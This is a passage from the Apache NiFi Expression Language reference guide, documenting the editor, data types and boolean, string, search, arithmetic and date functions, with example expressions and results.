Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and whether or not this Property\nsupports the Expression Language.\n\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begun by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of an automated dataflow. Each function takes \nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. 
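For example, the following Expression (a sketch that assumes a ``filename'' attribute whose value ends with a file extension) chains three functions to test whether that extension is ``txt'', regardless of case:\n\n----------------------------------------------------\n${filename:substringAfterLast('.'):toLower():equals('txt')}\n----------------------------------------------------\n\n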
See <<structure>> for more information \non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports three different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an integer comprised of one or more digits (`0` through `9`). The Expression Language \n\tdoes not provide support for fractional numbers. Dates and times are represented in the\n\tExpression Language as Numbers, representing the number of milliseconds since midnight GMT on January 1, 1970.\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAll attributes are considered to be of type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type. \nSee the <<type_cast>> section for more information. \n\n\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values. \nEach of these functions returns a value of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist. \n\tIt returns `false` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\t\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns `false` if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\t\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\t\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. 
Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\" \n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). 
Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} ):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'or' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as \n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}` \n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. 
Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.incubator.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value \n\t\"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.incubator.apache.org\/some value with spaces\".\n\n\n\n\n\n[.function]\n=== substring\n\n*Description*: \n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. 
That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: \n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:substringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. 
If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. 
If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces occurrences of one String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. 
If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.replaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return \n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n\n\n\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. 
`${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. 
This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\n\n[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. 
If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiply the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides the Subject by a numeric value and returns the result, rounded down to the nearest integer.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional\n\tsecond argument can be used to indicate the minimum number of characters to be used. 
If the converted value\n\thas fewer than this number of characters, the number will be padded with leading zeroes.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attribute has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\t\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n\n\n\n[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT January 1, 1970.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\t\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` | `2014\/12\/31 15:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS'Z'\")}` | `15:36:03.264Z`\n| `${time:format(\"2014\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Number, based on the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a String\n\tthat is formatted according to the argument. The return value is the number of milliseconds since \n\tMidnight GMT January 1, 1970.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\t\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat 